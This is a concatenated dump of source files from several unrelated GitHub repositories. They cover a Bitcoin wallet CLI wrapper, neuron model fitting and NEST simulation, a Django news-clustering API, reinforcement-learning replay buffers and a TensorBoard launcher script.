with open(join(fd_package_path, json_filename), 'wt') as f:
f.write(payload)
for tablename, df in data_tables.items():
if list(df.columns) != ['value']:
filename = create_table_filename(tablename)
else:
filename = create_auxiliary_table_filename(tablename)
df.to_csv(join(fd_package_path, filename), sep='\t', index=False)
def render_json_data_package(variables):
template = jinja_environment.from_string(fd_schema_file_contents)
return template.render(**variables)
``` |
{
"source": "JimmyMow/21-wallet",
"score": 3
} |
#### File: api/wallet/main.py
```python
import sys
import json
from os.path import expanduser
from two1.wallet import Two1Wallet
class Wallet():
def __init__(self):
with open('{}/.two1/wallet/default_wallet.json'.format(expanduser('~'))) as data_file:
wallet_data = json.load(data_file)
self.two1Wallet = Two1Wallet.import_from_mnemonic(mnemonic=wallet_data['master_seed'])
def address(self):
return self.two1Wallet.get_payout_address()
def confirmed(self):
return self.two1Wallet.confirmed_balance()
def unconfirmed(self):
return self.two1Wallet.unconfirmed_balance()
def history(self):
return self.two1Wallet.transaction_history()
wallet = None
wallet = wallet or Wallet()
del sys.argv[0]
for arg in sys.argv:
method = getattr(wallet, arg)
print(json.dumps({ arg: method() }))
``` |
{
"source": "JimmyMVP/neuron_to_nest_simplification",
"score": 3
} |
#### File: JimmyMVP/neuron_to_nest_simplification/current_generation.py
```python
import numpy as np
class CurrentGenerator:
def __init__(self, seed=777, time=5000, tau=3.0, i_e0=0.5, sigmaMax=0.325,
sigmaMin=0.215, frequency=0.2, dt=0.025, voltage=[],
threshold=0.0, sigmaOpt=0.51, optimize_flag=False, simulator=None):
self.simulator = simulator
self.seed = np.random.seed(seed)
self.time = time
self.tau = tau
self.i_e0 = i_e0
self.i_e = []
self.m_ie = []
self.sigmaMax = sigmaMax
self.sigmaMin = sigmaMin
self.sigma = (self.sigmaMax + self.sigmaMin) / 2
self.delta_sigma = (self.sigmaMax - self.sigmaMin) / (2 * self.sigma)
self.sin_variance = []
self.duration = 0.0
self.frequency = frequency
self.dt = dt
self.voltage = voltage
self.tolerance = 0.2
self.spks = []
self.spks_flag = False
self.threshold = threshold
self.optsigma = sigmaOpt
self.spks = []
self.optimize_flag = optimize_flag
def generate_current(self):
self.i_e = 0.0
if self.optimize_flag:
self.sin_variance = \
[variance for variance in self.current_variance_opt()]
else:
self.sin_variance = \
[variance for variance in self.current_variance()]
ou_process = [ou for ou in self.ou_process()]
moving_current = [mc for mc in self.moving_current_gen()]
for n, k in enumerate(np.arange(self.time / self.dt)):
"""
sin_sigma = sigma*(1+delta_sigma*np.sin(2*np.pi*f*t*10**-3))
I = OU_process*sin_sigma + mu
"""
yield self.i_e
self.i_e = ou_process[n] * self.sin_variance[n] + moving_current[n]
def moving_current_gen(self):
for _ in np.arange(self.time/self.dt):
yield self.i_e0*(1+np.sin(2 * np.pi * _
* self.frequency
* self.dt
* 10 ** -3
* 0.1
))
def ou_process(self):
for _ in np.arange(self.time/self.dt):
yield self.i_e
self.i_e = (self.i_e +
(self.i_e0 - self.i_e) * (self.dt / self.tau) +
0.5 * np.sqrt(2.0 * self.dt / self.tau) *
np.random.normal())
def sub_threshold_var(self):
selection = self.get_far_from_spikes()
sv = np.var(self.voltage[selection])
assert (np.max(self.voltage[selection]) < self.threshold)
return sv
def current_variance(self):
for time in np.arange(self.time / self.dt):
yield (self.sigma * (0.3 + self.delta_sigma * np.sin(2 * np.pi *
time
* self.frequency
* self.dt
* 10 ** -3)))
def current_variance_opt(self):
for time in np.arange(int(self.time / self.dt)):
yield (self.optsigma * (1.0 + 0.5 * np.sin(2 * np.pi * time
* self.frequency
* self.dt
* 10 ** -3)))
def detect_spikes(self, ref=7.0):
"""
Detect action potentials by threshold crossing (parameter threshold,
mV) from below (i.e. with dV/dt>0).
To avoid multiple detection of same spike due to noise, use an
'absolute refractory period' ref, in ms.
"""
ref_ind = int(ref / self.dt)
t = 0
while t < len(self.voltage) - 1:
if (self.voltage[t] >= self.threshold >=
self.voltage[t - 1]):
self.spks.append(t)
t += ref_ind
t += 1
self.spks = np.array(self.spks)
self.spks_flag = True
return self.spks
def get_far_from_spikes(self, d_t_before=5.0, d_t_after=5.0):
"""
Return indices of the trace which are in ROI. Exclude all datapoints
which are close to a spike.
d_t_before: ms
d_t_after: ms
These two parameters define the region to cut around each spike.
"""
if not self.spks_flag:
self.detect_spikes()
L = len(self.voltage)
LR_flag = np.ones(L)
LR_flag[:] = 0.0
# Remove region around spikes
DT_before_i = int(d_t_before / self.dt)
DT_after_i = int(d_t_after / self.dt)
for s in self.spks:
lb = max(0, s - DT_before_i)
ub = min(L, s + DT_after_i)
LR_flag[lb: ub] = 1
indices = np.where(LR_flag == 0)[0]
return indices
```
#### File: JimmyMVP/neuron_to_nest_simplification/modelfit.py
```python
import loading
import numpy as np
import cPickle as pickle
from Experiment import *
from GIF import *
from AEC_Badel import *
from AEC_Dummy import *
from Filter_Rect_LinSpaced import *
from Filter_Rect_LogSpaced import *
from Filter_Exps import *
import seaborn
import os
class GIFFit():
def __init__(self, simulator, plot=False):
self.simulator = simulator
self.V_units = 10 ** -3
self.I_units = 10 ** -9
self.trainData = []
self.testData = []
self.DT_beforespike = 5.0
self.T_ref = 4.0
self.tau_gamma = [10.0, 50.0, 250.0]
self.eta_tau_max = 1000.0
self.tau_opt = []
self.eta = []
self.gamma = []
self.plot = plot
@staticmethod
def chunks(l, n):
"""Yield successive n-sized chunks from l."""
for i in xrange(0, len(l), n):
yield l[i:i + n]
def run(self):
# Data[0] = Voltage, Data[1] = Current, Data[2] = Time
self.trainData, self.testData = loading.Loader(simulator=self.simulator).dataload()
self.myExp = Experiment('Experiment 1', .1)
for voltage, current, duration in zip(self.trainData[0],
self.trainData[1],
self.trainData[2]):
self.myExp.addTrainingSetTrace(voltage, self.V_units,
current, self.I_units,
np.size(duration) / 10,
FILETYPE='Array')
for voltage, current, duration in zip(self.testData[0],
self.testData[1],
self.testData[2]):
self.myExp.addTestSetTrace(voltage, self.V_units,
current, self.I_units,
np.size(duration) / 10,
FILETYPE='Array')
self.fitaec(self.myExp)
def paramDict(self, gif):
modelparam = {
'C_m': gif.C,
'g_L': gif.gl,
'E_L': gif.El,
'V_reset': gif.Vr,
't_ref': gif.Tref,
'V_T_star': gif.Vt_star,
'Delta_V': gif.DV,
'lambda_0': gif.lambda0,
'tau_stc': gif.eta.taus,
'q_stc': gif.eta.getCoefficients(),
'tau_sfa': gif.gamma.taus,
'q_sfa': gif.gamma.getCoefficients()
}
res = {
'model': modelparam
}
return res
def fitaec(self, myExp):
myAEC = AEC_Dummy()
myExp.setAEC(myAEC)
myExp.performAEC()
self.optimizetimescales(myExp)
def optimizetimescales(self, myExp):
if(self.plot):
myExp.plotTrainingSet()
myExp.plotTestSet()
myGIF_rect = GIF(0.1)
myGIF_rect.Tref = self.T_ref
myGIF_rect.eta = Filter_Rect_LogSpaced()
myGIF_rect.eta.setMetaParameters(length=500.0, binsize_lb=2.0,
binsize_ub=100.0, slope=4.5)
myGIF_rect.fitVoltageReset(myExp, myGIF_rect.Tref, do_plot=False)
myGIF_rect.fitSubthresholdDynamics(myExp,
DT_beforeSpike=self.DT_beforespike)
myGIF_rect.eta.fitSumOfExponentials(3, [1.0, 0.5, 0.1],
self.tau_gamma, ROI=None, dt=0.1)
print "Optimal timescales: ", myGIF_rect.eta.tau0
self.tau_opt = [t for t in myGIF_rect.eta.tau0 if t < self.eta_tau_max]
self.fitmodel(myExp)
def fitmodel(self, myExp):
myGIF = GIF(0.1)
myGIF.Tref = self.T_ref
myGIF.eta = Filter_Exps()
myGIF.eta.setFilter_Timescales(self.tau_opt)
myGIF.gamma = Filter_Exps()
myGIF.gamma.setFilter_Timescales(self.tau_gamma)
myGIF.fit(myExp, DT_beforeSpike=self.DT_beforespike)
myPrediction = myExp.predictSpikes(myGIF, nb_rep=500)
Md = myPrediction.computeMD_Kistler(4, 0.1)
if(self.plot):
myPrediction.plotRaster(delta=1000.0)
self.eta = myGIF.eta.getCoefficients()
self.gamma = myGIF.gamma.getCoefficients()
if(self.plot):
myGIF.plotParameters()
myGIF.save(os.path.join(self.simulator.PARAMETERS_PATH, 'myGIF.pck'))
self.model_params(myGIF)
def model_params(self, gif):
q_stc = []
q_sfa = []
res_dic = self.paramDict(gif)
# Fill in with your directory
pickle.dump(res_dic, open(os.path.join(self.simulator.PARAMETERS_PATH, 'GIFParams.pck'), "wb"))
for eta_index, eta in enumerate(res_dic['model']['q_stc']):
q_eta_temp = eta / (
1 - np.exp(-self.T_ref /
res_dic['model']['tau_stc'][eta_index]))
q_stc.append(q_eta_temp)
for gamma_index, gamma in enumerate(res_dic['model']['q_sfa']):
q_gamma_temp = gamma / (
1 - np.exp(-self.T_ref /
res_dic['model']['tau_sfa'][gamma_index]))
q_sfa.append(q_gamma_temp)
res_dic['model']['q_stc'] = q_stc
res_dic['model']['q_sfa'] = q_sfa
# Fill in with your directory MAKE SURE YOU USE THE SAME FOR NEST
pickle.dump(res_dic, open(os.path.join(self.simulator.PARAMETERS_PATH, "NESTParams.pck"), "wb"))
```
#### File: JimmyMVP/neuron_to_nest_simplification/NestGIFModel.py
```python
import nest
import nest.voltage_trace
import os
import numpy as np
import nest.raster_plot
import matplotlib.pyplot as plt
import cPickle as pickle
def dump_keys(d, lvl=0):
for k, v in d.iteritems():
print '%s%s' % (lvl * ' ', k)
if type(v) == dict:
dump_keys(v, lvl+1)
class NestModel:
def __init__(self, nest_params_path, threads=4):
self.name = self.__class__.__name__
self.built = False
self.connected = False
self.nest_params_path = nest_params_path
param_dict = pickle.load(open(nest_params_path))
param_dict['model']['C_m'] *= 10 ** 3
self.neuron_params = param_dict['model']
#Print parameters
dump_keys(self.neuron_params)
# NEST Model Parameters
self.neurons = 50
self.p_ex = 0.03
self.w_ex = 60.0
self.threads = threads
self.poisson_neurons = 5 # size of Poisson group
self.rate_noise = 5.0 # firing rate of Poisson neurons (Hz)
self.w_noise = 10.0 # synaptic weights from Poisson to population
self.dt = 0.1
self.simtime = 10000
# Misc
self.name = self.__class__.__name__
self.data_path = self.name + "/"
if not os.path.exists(self.data_path):
os.makedirs(self.data_path)
print("Writing data to: {0}".format(self.data_path))
nest.ResetKernel()
nest.SetKernelStatus({"data_path": self.data_path})
nest.SetKernelStatus({"resolution": self.dt})
def calibrate(self):
nest.SetKernelStatus({"print_time": True,
"local_num_threads": self.threads,
"resolution": self.dt})
def build(self):
"""
Create all nodes, used in the model.
"""
if self.built:
return
self.calibrate()
self.population = nest.Create("gif_psc_exp", self.neurons,
params=self.neuron_params)
self.noise = nest.Create("poisson_generator", self.poisson_neurons,
params={'rate': self.rate_noise})
self.spike_det = nest.Create("spike_detector")
self.voltmeter = nest.Create("voltmeter")
self.built = True
def connect(self):
"""
Connect all nodes in the model.
"""
if self.connected:
return
if not self.built:
self.build()
nest.Connect(self.population, self.population,
{'rule': 'pairwise_bernoulli',
'p': self.p_ex},
syn_spec={"weight": self.w_ex})
nest.Connect(self.noise, self.population, 'all_to_all',
syn_spec={"weight": self.w_noise})
nest.Connect(self.population, self.spike_det)
nest.Connect(self.voltmeter, self.population)
nest.SetStatus(self.voltmeter, [{"withgid": True}])
self.connected = True
def run(self):
"""
Simulate the model for simtime milliseconds and print the
firing rates of the network during htis period.
"""
if not self.connected:
self.connect()
nest.Simulate(self.simtime)
nest.voltage_trace.from_device(self.voltmeter)
nest.raster_plot.from_device(self.spike_det, hist=True)
plt.title('Population dynamics')
plt.show()
print(self.neuron_params)
NestModel(nest_params_path='/Users/vlasteli/Documents/Models/L5_TTPC1_cADpyr232_1/simulation/parameters/NESTParams.pck').run()
``` |
{
"source": "JimmyMVP/newsalyser",
"score": 2
} |
#### File: api/articles/models.py
```python
from django.db import models
from django.contrib.postgres.fields import ArrayField, JSONField
# Create your models here.
class Article(models.Model):
id = models.AutoField(primary_key=True)
brand = models.CharField(max_length = 600, blank = False)
title = models.CharField(max_length = 600, blank = False)
url = models.CharField(max_length = 600, blank = False, unique = True)
clustered = models.BooleanField(default = False)
added = models.DateTimeField(auto_now = True)
cluster = models.ForeignKey("Cluster", null = True)
json = JSONField()
category = models.CharField(max_length = 50, null = True)
top_taxonomy = models.CharField(max_length = 50, null = True)
tags = ArrayField(models.CharField(max_length = 30), null = True)
def __str__(self):
return str(self.json)
#Extracts top taxonomy and labels
def extract_top_taxonomy(self, taxonomy):
tags = []
firstLabel = taxonomy[0]["label"].split("/")[1:]
tags.extend(firstLabel[1:])
if(len(taxonomy) >= 2):
secondLabel = taxonomy[1]["label"].split("/")[1:]
if("confident" in taxonomy[1]):
tags.extend(secondLabel)
return tags
def __init__(self, **kwargs):
tags = self.extract_top_taxonomy(kwargs["json"]["taxonomy"])
kwargs["tags"] = tags
super().__init__(**kwargs)
class Cluster(models.Model):
cluster_title = models.CharField(max_length = 200)
category = models.CharField(max_length = 50)
added = models.DateTimeField(auto_now = True)
def __str__(self):
return str(cluster_title)
```
#### File: api/articles/views.py
```python
from django.shortcuts import render
from rest_framework.renderers import JSONRenderer
from rest_framework.response import Response
from rest_framework.decorators import api_view, renderer_classes
from . import collect as nlp_collect
from .models import Article,Cluster
import json
@api_view(['GET'])
@renderer_classes((JSONRenderer,))
def root(request, format=None):
content = {'user_count': "hello"}
return Response(content)
@api_view(['GET'])
def collect(request, format=None):
content = "Collected data"
print("Collecting the data...")
json = nlp_collect.get_bingp()
for category in json:
nlp_collect.analyse(json[category])
return Response(content)
@api_view(['GET'])
@renderer_classes((JSONRenderer,))
def random(request, format=None):
print("Issuing random article...")
articles = Article.objects.order_by("added").values()
return Response(articles[0], headers = {"Access-Control-Allow-Origin" : "*"})
@api_view(['POST'])
@renderer_classes((JSONRenderer,))
def get_clusters(request, format=None):
print("Issuing clusters...")
print("Request" + str(request.body))
attribute_preferences = json.loads(request.body.decode("utf-8"))
clusters = Cluster.objects.values()
if("category" in attribute_preferences):
clusters = clusters.filter(category = attribute_preferences["category"])
if("num" in attribute_preferences):
clusters = clusters[:int(attribute_preferences["num"])]
if len(clusters) == 0:
return Response({"empty" : True})
return Response(clusters, headers = {"Access-Control-Allow-Origin" : "*"})
@api_view(['POST'])
@renderer_classes((JSONRenderer,))
def get_cluster(request, format=None):
print("Issuing cluster...")
print("Request" + str(request.body))
attribute_preferences = json.loads(request.body.decode("utf-8"))
print(attribute_preferences)
cluster = Cluster.objects.filter(cluster_title = attribute_preferences["title"]).first()
if(not "title" in attribute_preferences):
return Response({"Error" : "I need the title of the cluster"})
articles = Article.objects.filter(cluster__cluster_title = attribute_preferences["title"]).values()
return Response(articles, headers = {"Access-Control-Allow-Origin" : "*"})
@api_view(['POST'])
@renderer_classes((JSONRenderer,))
def specific(request, format=None):
print("Issuing specific articles...")
print("Request" + str(request.body))
attribute_preferences = json.loads(request.body.decode("utf-8"))
articles = Article.objects.order_by("added").values()
if("num" in attribute_preferences):
articles = articles[:int(attribute_preferences["num"])]
if("category" in attribute_preferences):
articles = articles.filter(category = attribute_preferences["category"])
if len(articles) == 0:
return Response({"empty" : True})
return Response(articles, headers = {"Access-Control-Allow-Origin" : "*"})
```
#### File: newsalyser/server/scraper.py
```python
import newspaper
#Returns the urls of the articles in the news sites
def scrape(news_sites=[]):
urlmap = {}
for site in news_sites:
news = newspaper.build(site)
urlmap[site] = []
for article in news.articles:
urlmap[site].append(article.url)
print(urlmap)
return urlmap
``` |
{
"source": "JimmyMVP/plain_rl",
"score": 3
} |
#### File: torch_rl/memory/core.py
```python
from __future__ import absolute_import
from collections import deque, namedtuple
import warnings
import random
from typing import overload
import numpy as np
# [reference] https://github.com/matthiasplappert/keras-rl/blob/master/rl/memory.py
# This is to be understood as a transition: Given `state0`, performing `action`
# yields `reward` and results in `state1`, which might be `terminal`.
Experience = namedtuple('Experience', 'state0, goal, action, reward, state1, terminal1')
def sample_batch_indexes(low, high, size):
if high - low >= size:
# We have enough data. Draw without replacement, that is each index is unique in the
# batch. We cannot use `np.random.choice` here because it is horribly inefficient as
# the memory grows. See https://github.com/numpy/numpy/issues/2764 for a discussion.
# `random.sample` does the same thing (drawing without replacement) and is way faster.
try:
r = xrange(low, high)
except NameError:
r = range(low, high)
batch_idxs = random.sample(r, size)
else:
# Not enough data. Help ourselves with sampling from the range, but the same index
# can occur multiple times. This is not good and should be avoided by picking a
# large enough warm-up phase.
warnings.warn('Not enough entries to sample without replacement. Consider increasing your warm-up phase to avoid oversampling!')
batch_idxs = np.random.random_integers(low, high - 1, size=size)
assert len(batch_idxs) == size
return batch_idxs
class RingBuffer(object):
def __init__(self, maxlen):
self.maxlen = maxlen
self.start = 0
self.length = 0
self.data = [None for _ in range(maxlen)]
def __len__(self):
return self.length
def __getitem__(self, idx):
if idx < 0 or idx >= self.length:
raise KeyError()
return self.data[(self.start + idx) % self.maxlen]
@property
def last_idx(self):
return (self.length-1 + self.start)%self.maxlen
def append(self, v):
if self.length < self.maxlen:
# We have space, simply increase the length.
self.length += 1
elif self.length == self.maxlen:
# No space, "remove" the first item.
self.start = (self.start + 1) % self.maxlen
else:
# This should never happen.
raise RuntimeError()
self.data[(self.start + self.length - 1) % self.maxlen] = v
def pop(self, size):
if self.length-size <= 0:
raise Exception("This should not happen")
if self.start >= size:
self.start -= size
else:
self.length += self.start - size
self.start = 0
def __iter__(self):
for i in range(self.start, self.length):
yield self[i]
if self.start > 0:
for i in range(0, self.start):
yield self[i]
def clear(self):
self.start = 0
self.length = 0
def zeroed_observation(observation):
if hasattr(observation, 'shape'):
return np.zeros(observation.shape)
elif hasattr(observation, '__iter__'):
out = []
for x in observation:
out.append(zeroed_observation(x))
return out
else:
return 0.
class Memory(object):
def __init__(self, window_length=1, ignore_episode_boundaries=False):
self.window_length = window_length
self.ignore_episode_boundaries = ignore_episode_boundaries
self.recent_observations = deque(maxlen=window_length)
self.recent_terminals = deque(maxlen=window_length)
def sample(self, batch_size, batch_idxs=None):
raise NotImplementedError()
def append(self, observation, action, reward, terminal, training=True):
self.recent_observations.append(observation)
self.recent_terminals.append(terminal)
def get_recent_state(self, current_observation):
# This code is slightly complicated by the fact that subsequent observations might be
# from different episodes. We ensure that an experience never spans multiple episodes.
# This is probably not that important in practice but it seems cleaner.
state = [current_observation]
idx = len(self.recent_observations) - 1
for offset in range(0, self.window_length - 1):
current_idx = idx - offset
current_terminal = self.recent_terminals[current_idx - 1] if current_idx - 1 >= 0 else False
if current_idx < 0 or (not self.ignore_episode_boundaries and current_terminal):
# The previously handled observation was terminal, don't add the current one.
# Otherwise we would leak into a different episode.
break
state.insert(0, self.recent_observations[current_idx])
while len(state) < self.window_length:
state.insert(0, zeroed_observation(state[0]))
return state
def get_config(self):
config = {
'window_length': self.window_length,
'ignore_episode_boundaries': self.ignore_episode_boundaries,
}
return config
def clear(self):
for i in dir(self):
a = getattr(self, i)
if isinstance(a, RingBuffer):
a.clear()
elif isinstance(a, list):
a = []
class EpisodeParameterMemory(Memory):
def __init__(self, limit, **kwargs):
super(EpisodeParameterMemory, self).__init__(**kwargs)
self.limit = limit
self.params = RingBuffer(limit)
self.intermediate_rewards = []
self.total_rewards = RingBuffer(limit)
def sample(self, batch_size, batch_idxs=None):
if batch_idxs is None:
batch_idxs = sample_batch_indexes(0, self.nb_entries, size=batch_size)
assert len(batch_idxs) == batch_size
batch_params = []
batch_total_rewards = []
for idx in batch_idxs:
batch_params.append(self.params[idx])
batch_total_rewards.append(self.total_rewards[idx])
return batch_params, batch_total_rewards
def append(self, observation, action, reward, terminal, training=True):
super(EpisodeParameterMemory, self).append(observation, action, reward, terminal, training=training)
if training:
self.intermediate_rewards.append(reward)
def finalize_episode(self, params):
total_reward = sum(self.intermediate_rewards)
self.total_rewards.append(total_reward)
self.params.append(params)
self.intermediate_rewards = []
@property
def nb_entries(self):
return len(self.total_rewards)
def get_config(self):
config = super(SequentialMemory, self).get_config()
config['limit'] = self.limit
return config
```
#### File: torch_rl/memory/hindsight.py
```python
from torch_rl.memory.core import *
class HindsightMemory(Memory):
"""
Implementation of replay memory for hindsight experience replay with future
transition sampling.
"""
def __init__(self, limit, hindsight_size=8, goal_indices=None, reward_function=lambda observation,goal: 1, **kwargs):
super(HindsightMemory, self).__init__(**kwargs)
self.hindsight_size = hindsight_size
self.reward_function = reward_function
self.hindsight_buffer = RingBuffer(limit)
self.goals = RingBuffer(limit)
self.actions = RingBuffer(limit)
self.rewards = RingBuffer(limit)
self.terminals = RingBuffer(limit)
self.observations = RingBuffer(limit)
self.limit = limit
self.last_terminal_idx = 0
self.goal_indices = goal_indices
def append(self, observation, action, reward, terminal, goal=None, training=True):
if training:
self.observations.append(observation)
self.actions.append(action)
self.rewards.append(reward)
self.terminals.append(terminal)
if goal is None:
goal = observation[self.goal_indices]
self.goals.append(goal)
if terminal:
"""
Sample hindsight_size of states added from recent terminal state to this one.
"""
self.add_hindsight()
self.last_terminal_idx = self.goals.last_idx
super(HindsightMemory, self).append(observation, action, reward, terminal, training=True)
def __getitem__(self, idx):
if idx < 0 or idx >= self.nb_entries:
raise KeyError()
return self.observations[idx], self.goals[idx], self.actions[idx], self.rewards[idx], self.terminals[idx]
def pop(self):
"""
Remove last hindsight_size of elements because they were not
used to generate hindsight.
"""
self.observations.pop(self.hindsight_size)
self.actions.pop(self.hindsight_size)
self.goals.pop(self.hindsight_size)
self.terminals.pop(self.hindsight_size)
self.rewards.pop(self.hindsight_size)
def add_hindsight(self):
for i in range(self.last_terminal_idx+1, self.observations.last_idx-self.hindsight_size):
# For every state in episode sample hindsight_size from future states
# hindsight_idx = sample_batch_indexes(i+1, self.observations.last_idx, self.hindsight_size)
hindsight_experience = (self.observations.last_idx - i - 1)*[None]
for j,idx in enumerate(range(i+1, self.observations.last_idx)):
hindsight_experience[j] = [i,idx]
self.hindsight_buffer.append(np.asarray(hindsight_experience))
def sample_and_split(self, num_transitions, batch_idxs=None, split_goal=False):
batch_size = num_transitions*self.hindsight_size + num_transitions
batch_idxs = sample_batch_indexes(0, self.hindsight_buffer.length, size=num_transitions)
state0_batch = []
reward_batch = []
goal_batch = []
action_batch = []
terminal1_batch = []
state1_batch = []
for idx in batch_idxs:
# Add hindsight experience to batch
hindsight_idxs = sample_batch_indexes(0, len(self.hindsight_buffer[idx]), self.hindsight_size)
for root_idx, hindsight_idx in self.hindsight_buffer[idx][hindsight_idxs]:
state0_batch.append(self.observations[hindsight_idx])
state1_batch.append(self.observations[hindsight_idx+1])
reward_batch.append(1.)
action_batch.append(self.actions[hindsight_idx])
goal_batch.append(self.observations[hindsight_idx+1] if self.goal_indices is None else \
self.observations[hindsight_idx+1][self.goal_indices])
state0_batch.append(self.observations[root_idx])
state1_batch.append(self.observations[root_idx + 1])
reward_batch.append(self.rewards[root_idx])
action_batch.append(self.actions[root_idx])
goal_batch.append(self.goals[root_idx])
# Prepare and validate parameters.
state0_batch = np.array(state0_batch).reshape(batch_size,-1)
state1_batch = np.array(state1_batch).reshape(batch_size,-1)
terminal1_batch = np.array(terminal1_batch).reshape(batch_size,-1)
reward_batch = np.array(reward_batch).reshape(batch_size,-1)
action_batch = np.array(action_batch).reshape(batch_size,-1)
goal_batch = np.array(goal_batch).reshape(batch_size, -1)
if split_goal:
return state0_batch, action_batch, reward_batch, state1_batch, terminal1_batch, goal_batch
else:
state0_batch[:, self.goal_indices] = goal_batch
state1_batch[:, self.goal_indices] = goal_batch
return state0_batch, action_batch, reward_batch, state1_batch, terminal1_batch
@property
def nb_entries(self):
return len(self.observations)
from .sequential import GeneralisedMemory
class GeneralisedHindsightMemory(GeneralisedMemory):
"""
Implementation of replay memory for hindsight experience replay with future
transition sampling.
"""
def __init__(self, limit, hindsight_size=8, goal_indices=None, reward_function=lambda observation,goal: 1, **kwargs):
super(GeneralisedHindsightMemory, self).__init__(limit,**kwargs)
self.hindsight_size = hindsight_size
self.reward_function = reward_function
self.hindsight_buffer = RingBuffer(limit)
self.goals = RingBuffer(limit)
self.limit = limit
self.last_terminal_idx = 0
self.goal_indices = goal_indices
def append(self, observation, action, reward, terminal, extra_info=None,training=True, goal=None):
if training:
if goal is None:
goal = observation[self.goal_indices]
self.goals.append(goal)
if terminal:
"""
Sample hindsight_size of states added from recent terminal state to this one.
"""
self.add_hindsight()
self.last_terminal_idx = self.goals.last_idx
super(GeneralisedHindsightMemory, self).append(observation, action, reward, terminal, extra_info=extra_info, training=True)
def __getitem__(self, idx):
if idx < 0 or idx >= self.nb_entries:
raise KeyError()
return self.observations[idx], self.goals[idx], self.actions[idx], self.rewards[idx], self.terminals[idx]
def add_hindsight(self):
for i in range(self.last_terminal_idx+1, self.observations.last_idx-self.hindsight_size):
# For every state in episode sample hindsight_size from future states
# hindsight_idx = sample_batch_indexes(i+1, self.observations.last_idx, self.hindsight_size)
hindsight_experience = (self.observations.last_idx - i - 1)*[None]
for j,idx in enumerate(range(i+1, self.observations.last_idx)):
hindsight_experience[j] = [i,idx]
self.hindsight_buffer.append(np.asarray(hindsight_experience))
def sample_and_split(self, num_transitions, batch_idxs=None, split_goal=False):
batch_size = num_transitions*self.hindsight_size + num_transitions
batch_idxs = sample_batch_indexes(0, self.hindsight_buffer.length, size=num_transitions)
state0_batch = []
reward_batch = []
goal_batch = []
action_batch = []
terminal1_batch = []
state1_batch = []
extra_info = []
for idx in batch_idxs:
# Add hindsight experience to batch
hindsight_idxs = sample_batch_indexes(0, len(self.hindsight_buffer[idx]), self.hindsight_size)
for root_idx, hindsight_idx in self.hindsight_buffer[idx][hindsight_idxs]:
state0_batch.append(self.observations[hindsight_idx])
state1_batch.append(self.observations[hindsight_idx+1])
reward_batch.append(1.)
action_batch.append(self.actions[hindsight_idx])
goal_batch.append(self.observations[hindsight_idx+1] if self.goal_indices is None else \
self.observations[hindsight_idx+1][self.goal_indices])
extra_info.append(self.extra_info[hindsight_idx])
state0_batch.append(self.observations[root_idx])
state1_batch.append(self.observations[root_idx + 1])
reward_batch.append(self.rewards[root_idx])
action_batch.append(self.actions[root_idx])
goal_batch.append(self.goals[root_idx])
extra_info.append(self.extra_info[root_idx])
# Prepare and validate parameters.
state0_batch = np.array(state0_batch).reshape(batch_size,-1)
state1_batch = np.array(state1_batch).reshape(batch_size,-1)
terminal1_batch = np.array(terminal1_batch).reshape(batch_size,-1)
reward_batch = np.array(reward_batch).reshape(batch_size,-1)
action_batch = np.array(action_batch).reshape(batch_size,-1)
extra_info_batch = np.array(extra_info).reshape(batch_size,-1)
goal_batch = np.array(goal_batch).reshape(batch_size,-1)
if split_goal:
return state0_batch, action_batch, reward_batch, state1_batch, terminal1_batch, extra_info, goal_batch
else:
state0_batch[:, self.goal_indices] = goal_batch
state1_batch[:, self.goal_indices] = goal_batch
return state0_batch, action_batch, reward_batch, state1_batch, terminal1_batch, extra_info_batch
@property
def nb_entries(self):
return len(self.observations)
```
#### File: torch_rl/tests/ppo_test.py
```python
from unittest import TestCase
import pytest
import gym
import sys
import numpy as np
class PPOTest(TestCase):
@classmethod
def setup_class(cls):
""" setup any state specific to the execution of the given class (which
usually contains tests).
"""
cls.episode = 1
cls.T = 10
cls.env = gym.make('Pendulum-v0')
cls.gamma = .99
cls.lmda = .95
cls.def_reward = 1.
cls.def_value = 4.
def test_advantage_calculation(self):
values = np.zeros(self.T)
advantages = np.zeros(self.T)
rewards = np.zeros(self.T)
returns = np.zeros(self.T)
for i in range(self.T):
rewards[i] = self.def_reward
values[i] = self.def_value
lastgaelem = 0
for j in reversed(range(i)):
td = self.def_reward + values[j+1]*self.gamma - values[j]
A = lastgaelem = self.lmda * self.gamma * lastgaelem + td
advantages[j] = A
returns[j] = A + values[j]
print(advantages)
print(returns)
if __name__ == '__main__':
pytest.main([sys.argv[0]])
```
#### File: torch_rl/utils/start_tensorboard.py
```python
import glob
import subprocess
import os
import sys
from torch_rl.utils import init_parser, addarg, cmdl_args
from datetime import date
import time
import argparse
if __name__ == '__main__':
description = ("Starts tensorboard on all of the subdirectories in TRL_DATA_PATH unless"
" specified otherwise. The directory structure should be as follows:"
" TRL_DATA_PATH/EXPERIMENT_DIR/tensorboard, every directory should contain"
" a tensorboard directory with tensorboard logs.")
init_parser(description)
addarg('port', type=int, default=6006, info="port on which to start tensorboard")
addarg('work-dir', type=str, default=os.environ['TRL_DATA_PATH'], info="path to directory that contains the data")
addarg('reg', type=str, default=['*'], info="regex expressions to search for")
addarg('delta', type=str, default=None, info="modified since DELTA something ago. [d|m|h]NUM")
addarg('dry', type=bool, default=False, info="dry run")
addarg('time-info', type=bool, default=False, info="add timestamps to logdir labels")
def mtime_check(path, ds):
t = os.path.getmtime(path)
d1 = date.fromtimestamp(int(t))
d2 = date.fromtimestamp(int(time.time()))
delta = d2 - d1
num = int(ds[1:])
if ds[0] == 'm':
delta = delta.minutes
elif ds[0] == 'h':
delta = delta.hours
elif ds[0] == 'd':
delta = delta.days
return delta <= num
assert 'TRL_DATA_PATH' in os.environ, 'TRL_DATA_PATH has to be set in environment'
p = cmdl_args()
work_dir = p.work_dir
# Regex for files to run tensorboard with
regexes = p.reg
paths = []
logdir_string='--logdir='
for regex in regexes:
dirs = glob.glob(work_dir+'/'+regex)
paths.extend([os.path.abspath(x) for x in dirs])
if p.delta:
paths = list(filter(lambda x: mtime_check(x, p.delta), paths))
print("Num files:", len(paths))
if p.dry:
sys.exit(1)
for path in paths:
dirname = path.split("/")[-1]
date_prefix = ""
if p.time_info:
date_prefix = date.fromtimestamp(os.path.getmtime(path)).strftime("%Y-%d-%m")
if p.time_info:
logdir_string+= "{}{}:{},".format(date_prefix, dirname, os.path.join(path, 'tensorboard'))
else:
logdir_string+= "{}:{},".format(dirname, os.path.join(path, 'tensorboard'))
port_str = '--port='+str(p.port)
print(logdir_string)
subprocess.call(['tensorboard', logdir_string[:-1], port_str])
``` |
{
"source": "jimmynguyen/codefights",
"score": 3
} |
